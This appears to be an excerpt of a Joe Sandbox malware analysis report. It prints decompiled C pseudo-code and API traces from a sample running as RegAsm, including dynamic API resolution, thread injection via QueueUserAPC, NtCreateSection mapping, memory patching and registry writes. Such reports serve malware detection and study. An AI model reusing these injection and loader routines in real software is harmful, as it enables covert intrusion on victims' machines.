								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404184 + 0x405119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404184 + 0x40512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040182F(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401e61
0x00401e65
0x00401f26
0x00401e6b
0x00401e83
0x00401e92
0x00401e99
0x00401e9d
0x00401ea0
0x00401f1e
0x00401f1f
0x00401ea2
0x00401eaf
0x00401eb3
0x00401eb6
0x00000000
0x00401eb8
0x00401ec5
0x00401ec9
0x00401ecc
0x00000000
0x00401ece
0x00401edb
0x00401edf
0x00401ee2
0x00000000
0x00401ee4
0x00401ef1
0x00401ef5
0x00401ef8
0x00000000
0x00401efa
0x00401f00
0x00401f06
0x00401f0b
0x00401f12
0x00401f15
0x00000000
0x00401f17
0x00401f1a
0x00401f1a
0x00401f15
0x00401ef8
0x00401ee2
0x00401ecc
0x00401eb6
0x00401ea0
0x00401f34

APIs

Part of subcall function 00401F96: HeapAlloc.KERNEL32(00000000,?,0040143B,00000030,?,00000000), ref: 00401FA2

GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,00401738,?,?,?,?,00000002,?,?,?), ref: 00401E77
GetProcAddress.KERNEL32(00000000,?), ref: 00401E99
GetProcAddress.KERNEL32(00000000,?), ref: 00401EAF
GetProcAddress.KERNEL32(00000000,?), ref: 00401EC5
GetProcAddress.KERNEL32(00000000,?), ref: 00401EDB
GetProcAddress.KERNEL32(00000000,?), ref: 00401EF1

Part of subcall function 0040182F: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 0040188C
Part of subcall function 0040182F: memset.NTDLL ref: 004018AE

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 47b87b9114d10b5a405e22ccd2a867bb6694247282225e296b4ff78b154074b0
Instruction ID: 47d1e07b2065a186937840aea2ea33ddc9adef54ec9fe94e98c8b908c335444a
Opcode Fuzzy Hash: 47b87b9114d10b5a405e22ccd2a867bb6694247282225e296b4ff78b154074b0
Instruction Fuzzy Hash: C0212DF160060BAFD720DF69DA84E6B77ECEB44754704447AF909EB261E734E9018F68

Uniqueness

Uniqueness Score: -1.00%

Function 010A2B33, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A2B33(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E010A4573(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x10aa2d4; // 0x235d5a8
					_t1 = _t23 + 0x10ab11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x10aa2d4; // 0x235d5a8
					_t2 = _t26 + 0x10ab787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E010A2625(_t54);
					} else {
						_t30 =  *0x10aa2d4; // 0x235d5a8
						_t5 = _t30 + 0x10ab774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x10aa2d4; // 0x235d5a8
							_t7 = _t33 + 0x10ab797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x10aa2d4; // 0x235d5a8
								_t9 = _t36 + 0x10ab756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x10aa2d4; // 0x235d5a8
									_t11 = _t39 + 0x10ab7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E010A5D85(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x010a2b42
0x010a2b46
0x010a2c08
0x010a2b4c
0x010a2b4c
0x010a2b51
0x010a2b64
0x010a2b66
0x010a2b6b
0x010a2b73
0x010a2b7a
0x010a2b7e
0x010a2b81
0x010a2c00
0x010a2c01
0x010a2b83
0x010a2b83
0x010a2b88
0x010a2b90
0x010a2b94
0x010a2b97
0x00000000
0x010a2b99
0x010a2b99
0x010a2b9e
0x010a2ba6
0x010a2baa
0x010a2bad
0x00000000
0x010a2baf
0x010a2baf
0x010a2bb4
0x010a2bbc
0x010a2bc0
0x010a2bc3
0x00000000
0x010a2bc5
0x010a2bc5
0x010a2bca
0x010a2bd2
0x010a2bd6
0x010a2bd9
0x00000000
0x010a2bdb
0x010a2be1
0x010a2be6
0x010a2bed
0x010a2bf4
0x010a2bf7
0x00000000
0x010a2bf9
0x010a2bfc
0x010a2bfc
0x010a2bf7
0x010a2bd9
0x010a2bc3
0x010a2bad
0x010a2b97
0x010a2b81
0x010a2c16

APIs

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,010A5C64,?,?,?,?,00000000,00000000), ref: 010A2B58
GetProcAddress.KERNEL32(00000000,7243775A), ref: 010A2B7A
GetProcAddress.KERNEL32(00000000,614D775A), ref: 010A2B90
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 010A2BA6
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010A2BBC
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010A2BD2

Part of subcall function 010A5D85: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,010A2BF2), ref: 010A5DE2
Part of subcall function 010A5D85: memset.NTDLL ref: 010A5E04

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 9599faa31dadcac025357f5561505274ba8b5f74c0bb54005dc7177eba144a4b
Instruction ID: e56bc9eec74ddb760ccd27717ea29584047ff277a7389881aed6679211ecdfb2
Opcode Fuzzy Hash: 9599faa31dadcac025357f5561505274ba8b5f74c0bb54005dc7177eba144a4b
Instruction Fuzzy Hash: 71216BB160060AEFD760DFACC888E9B7BECEB08240B854575E589C7245EB79E904CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F16239, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

GetModuleHandleA.KERNEL32(?,00000020,?,?,00000FFF,?,?,?,03F1B49C,3D03F261,?,?,00000000,00000000), ref: 03F1625E
GetProcAddress.KERNEL32(00000000,?), ref: 03F16280
GetProcAddress.KERNEL32(00000000,?), ref: 03F16296
GetProcAddress.KERNEL32(00000000,?), ref: 03F162AC
GetProcAddress.KERNEL32(00000000,?), ref: 03F162C2
GetProcAddress.KERNEL32(00000000,?), ref: 03F162D8

Part of subcall function 03F1CEED: NtCreateSection.NTDLL(?,000F001F,?,3D03F261,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 03F1CF4A
Part of subcall function 03F1CEED: memset.NTDLL ref: 03F1CF6E

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: f38116ffd8447104bbe4f71c98ce3b646f1b5071dbf920bdc2701c0e60e92579
Instruction ID: 5de6eab565c8c127eb98608adf37bc41af6646441bce53b1b41d463aabf7e043
Opcode Fuzzy Hash: f38116ffd8447104bbe4f71c98ce3b646f1b5071dbf920bdc2701c0e60e92579
Instruction Fuzzy Hash: 3C218CB1A0070AEFD760EF69DD84E5EB7ECEB19344B158225E805CB305E735E9068B70

Uniqueness

Uniqueness Score: -1.00%

Function 03F227B2, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,03F062B9), ref: 03F227C9
QueueUserAPC.KERNELBASE(?,00000000,03F1BD43,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227DE
GetLastError.KERNEL32(00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227E9
TerminateThread.KERNEL32(00000000,00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227F3
CloseHandle.KERNEL32(00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227FA
SetLastError.KERNEL32(00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F22803

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 000182f6e10be189694ad991bf2e18d566f261f28eec220898ff3f6b39880063
Instruction ID: 83c719d417777c843160e47611ecf5522287a99eddad54031d1986cbf682a9b0
Opcode Fuzzy Hash: 000182f6e10be189694ad991bf2e18d566f261f28eec220898ff3f6b39880063
Instruction Fuzzy Hash: 17F08232601225FBD331BB60AC58F9FBE68FF28B56F040415FA46D1068C7B998109B91

Uniqueness

Uniqueness Score: -1.00%

Function 010A1821, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E010A1821(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x10aa38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E010A6803( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E010A5E3E(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E010A2625(_a8);
						goto L29;
					}
					_t64 =  *0x10aa2cc; // 0x3409cd0
					_t16 = _t64 + 0xc; // 0x3409dc4
					_t65 = E010A6803(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d010a90, executed
						_t67 = E010A32A6(_t97,  *_t33, _t91, _a8,  *0x10aa384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x10aa2d4; // 0x235d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x10ab9ef; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x10ab907; // 0x55434b48
								_t69 = _t34;
							}
							if(E010A3F52(_t69,  *0x10aa384,  *0x10aa388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x10aa2d4; // 0x235d5a8
									_t44 = _t71 + 0x10ab892; // 0x74666f53
									_t73 = E010A6803(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d010a90
										E010A3A49( *_t47, _t91, _a8,  *0x10aa388, _a24);
										_t49 = _t101 + 0x10; // 0x3d010a90
										E010A3A49( *_t49, _t91, _t99,  *0x10aa380, _a16);
										E010A2625(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d010a90, executed
									E010A3A49( *_t40, _t91, _a8,  *0x10aa388, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d010a90
									E010A3A49( *_t43, _t91, _a8,  *0x10aa380, _a16);
								}
								if( *_t101 != 0) {
									E010A2625(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d010a90, executed
					_t81 = E010A63A2( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d010a90
							E010A32A6(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E010A2625(_t100);
						_t98 = _a16;
					}
					E010A2625(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E010A792E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x10aa38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x010a1821
0x010a182a
0x010a1831
0x010a1836
0x010a18a3
0x010a18a9
0x010a18ae
0x010a18b5
0x010a18bc
0x010a18bf
0x010a1a2a
0x010a1a31
0x010a1a31
0x010a1a36
0x010a1a38
0x010a1a38
0x010a1a41
0x010a1a41
0x010a18c5
0x010a18ca
0x010a18d1
0x010a1a20
0x010a1a23
0x00000000
0x010a1a23
0x010a18d7
0x010a18dc
0x010a18df
0x010a18e6
0x010a18e9
0x010a1932
0x010a1932
0x010a1945
0x010a1948
0x010a194f
0x010a1957
0x010a195c
0x010a1966
0x010a1966
0x010a195e
0x010a195e
0x010a195e
0x010a195e
0x010a1988
0x010a1990
0x010a19be
0x010a19c3
0x010a19ca
0x010a19cf
0x010a19d3
0x010a1a05
0x010a19d5
0x010a19e2
0x010a19e5
0x010a19f5
0x010a19f8
0x010a19fe
0x010a19fe
0x010a1992
0x010a199f
0x010a19a2
0x010a19b4
0x010a19b7
0x010a19b7
0x010a1a0f
0x010a1a1b
0x010a1a11
0x010a1a14
0x010a1a14
0x010a1a0f
0x010a1988
0x00000000
0x010a194f
0x010a18f8
0x010a18fb
0x010a1902
0x010a1908
0x010a190b
0x010a190d
0x010a1919
0x010a191c
0x010a191c
0x010a1922
0x010a1927
0x010a1927
0x010a192d
0x00000000
0x010a192d
0x010a183b
0x00000000
0x010a1862
0x010a1862
0x010a186e
0x010a1881
0x010a1887
0x010a188f
0x00000000
0x010a188f

APIs

StrChrA.SHLWAPI(010A2148,0000005F,00000000,00000000,00000104), ref: 010A1854
lstrcpy.KERNEL32(?,?), ref: 010A1881

Part of subcall function 010A6803: lstrlen.KERNEL32(?,00000000,03409CD0,7691C740,010A3EDC,03409ED5,?,?,?,?,?,69B25F44,E8FA7DD7,00000000,010A59A5), ref: 010A680A
Part of subcall function 010A6803: mbstowcs.NTDLL ref: 010A6833
Part of subcall function 010A6803: memset.NTDLL ref: 010A6845

Part of subcall function 010A3A49: lstrlenW.KERNEL32(?,?,?,010A19EA,3D010A90,80000002,010A2148,010A5FF9,74666F53,4D4C4B48,010A5FF9,?,3D010A90,80000002,010A2148,?), ref: 010A3A6E

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

lstrcpy.KERNEL32(?,00000000), ref: 010A18A3

Strings

\, xrefs: 010A1887
(, xrefs: 010A1904

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 24481b0b0bdf4999f4ae23be3024f8a4a113b26e0bda9987d8a2dbd58642bb44
Instruction ID: 770c12073b8d8d6b0c37603355038b4431e4b49c5414bdd80c9e9d014db50b09
Opcode Fuzzy Hash: 24481b0b0bdf4999f4ae23be3024f8a4a113b26e0bda9987d8a2dbd58642bb44
Instruction Fuzzy Hash: C251587660020AFFDF629FE4DC40EEA7BB9EB18340F808564FA9597060D73AD925DB10

Uniqueness

Uniqueness Score: -1.00%

Function 010A559F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E010A559F(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E010A5171(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x10aa2d4; // 0x235d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x10ab4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x10ab90c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x10aa100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x010a559f
0x010a55a6
0x010a55aa
0x010a55af
0x010a55b6
0x010a55b9
0x010a55c3
0x010a55c8
0x010a55d4
0x010a55db
0x010a55e5
0x010a55e5
0x010a55dd
0x010a55dd
0x010a55dd
0x010a55dd
0x010a55eb
0x010a55ee
0x010a55f6
0x010a55f9
0x010a55fc
0x010a55ff
0x010a5604
0x010a560d
0x010a561a
0x010a560f
0x010a5615
0x010a5615
0x010a5620
0x010a5620
0x010a5628

APIs

Part of subcall function 010A5171: SysAllocString.OLEAUT32(?), ref: 010A51CD
Part of subcall function 010A5171: SysAllocString.OLEAUT32(0070006F), ref: 010A51E1
Part of subcall function 010A5171: SysAllocString.OLEAUT32(00000000), ref: 010A51F3
Part of subcall function 010A5171: SysFreeString.OLEAUT32(00000000), ref: 010A5257

memset.NTDLL ref: 010A55C3
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 010A55FF
GetLastError.KERNEL32 ref: 010A560F
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 010A5620

Strings

<, xrefs: 010A55D4

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: bcc99e5cbe53d973d8bf07d4455b56ba9b04063946cef95ca169d95b93edabd7
Instruction ID: 5fee1d66aaa81b89effc6675c03e88131a3fb4f5674d43bb3266000e18f11ce3
Opcode Fuzzy Hash: bcc99e5cbe53d973d8bf07d4455b56ba9b04063946cef95ca169d95b93edabd7
Instruction Fuzzy Hash: 83110C71900218ABDB10DFA9DC89BDD7BF8BB08394F848026F985E7280D775E544CF95

Uniqueness

Uniqueness Score: -1.00%

Function 03F1FA40, Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F1BC2F: VirtualProtect.KERNELBASE(03F11BE7,?,00000040,?,03F2B7A4,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000), ref: 03F1BC54
Part of subcall function 03F1BC2F: GetLastError.KERNEL32(?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BC5C
Part of subcall function 03F1BC2F: VirtualQuery.KERNEL32(03F11BE7,03F2B7A4,0000001C,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BC73
Part of subcall function 03F1BC2F: VirtualProtect.KERNEL32(03F11BE7,?,-2C9B417C,?,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BC98

GetLastError.KERNEL32(00000000,00000004,03F0F20D,?,810C74FC,00000000,?,03F28560,0000001C,03F19FA2,00000002,03F11BE7,00000001,0000000C,03F2B7A0,0000000C), ref: 03F1FB99

Part of subcall function 03F0811C: lstrlen.KERNEL32(03F2B620,03F2B7A4,00000402,03F2B7A4), ref: 03F08154
Part of subcall function 03F0811C: lstrcpy.KERNEL32(00000000,03F2B620), ref: 03F0816B
Part of subcall function 03F0811C: StrChrA.SHLWAPI(00000000,0000002E), ref: 03F08174
Part of subcall function 03F0811C: GetModuleHandleA.KERNEL32(00000000), ref: 03F08192

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,03F11BE7,?,03F2B620,03F11BE7,?,00000000,00000004,03F0F20D,?,810C74FC), ref: 03F1FB17
VirtualProtect.KERNELBASE(03F2B7A4,00000004,03F0F20D,03F0F20D,03F11BE7,?,00000000,00000004,03F0F20D,?,810C74FC,00000000,?,03F28560,0000001C,03F19FA2), ref: 03F1FB32
RtlEnterCriticalSection.NTDLL(03F2C300), ref: 03F1FB56
RtlLeaveCriticalSection.NTDLL(03F2C300), ref: 03F1FB74

Part of subcall function 03F1BC2F: SetLastError.KERNEL32(0000000C,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BCA1

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-0
Opcode ID: 103d67e69e47abbf6d66f8c95da4cb14c329945ae912848e06ccdfe119c3b963
Instruction ID: bc5c74d8d1b2085ad0a8cd0d14c87776c0605124f48fb2472925e9d3d04fbc20
Opcode Fuzzy Hash: 103d67e69e47abbf6d66f8c95da4cb14c329945ae912848e06ccdfe119c3b963
Instruction Fuzzy Hash: 48411A7590071AEFDB20EF69D855AAEBBB4FF08310F148219E915AB390D774E950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A268C, Relevance: 7.6, APIs: 5, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A268C(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x10aa2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x10aa2d4; // 0x235d5a8
				_t3 = _t8 + 0x10ab84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E010A6462(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x10aa2f8, 1, 0, _t30);
					E010A2625(_t30);
				}
				_t12 =  *0x10aa2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E010A1141(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E010A559F(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t14 = E010A5C48(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x010a268d
0x010a2694
0x010a269e
0x010a26a2
0x010a26a8
0x010a26b5
0x010a26bc
0x010a26c0
0x010a26d2
0x010a26d4
0x010a26d4
0x010a26d9
0x010a26e0
0x010a26eb
0x00000000
0x00000000
0x010a26ed
0x010a26f4
0x00000000
0x00000000
0x010a2701
0x010a2705
0x010a2707
0x010a270c
0x010a270c
0x010a2714
0x010a2719
0x010a271d
0x010a2721
0x00000000
0x00000000
0x010a272f
0x010a2733
0x00000000
0x00000000
0x010a2733
0x00000000
0x010a2735
0x010a2735
0x010a2735
0x010a273b
0x010a273d
0x010a273d
0x010a2742
0x010a2747
0x010a274b
0x010a275d
0x010a275d
0x010a2761
0x010a2767
0x010a2767
0x010a276a
0x010a276c
0x010a276f
0x010a276f
0x010a2776
0x010a277c
0x010a277c

APIs

Part of subcall function 010A6462: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,03409CD0,7691C740,?,?,69B25F44,E8FA7DD7,00000000,010A59A5,?,00000000), ref: 010A6498
Part of subcall function 010A6462: lstrcpy.KERNEL32(00000000,00000000), ref: 010A64BC
Part of subcall function 010A6462: lstrcat.KERNEL32(00000000,00000000), ref: 010A64C4

CreateEventA.KERNEL32(010AA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,010A2167,?,?,?), ref: 010A26CB

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

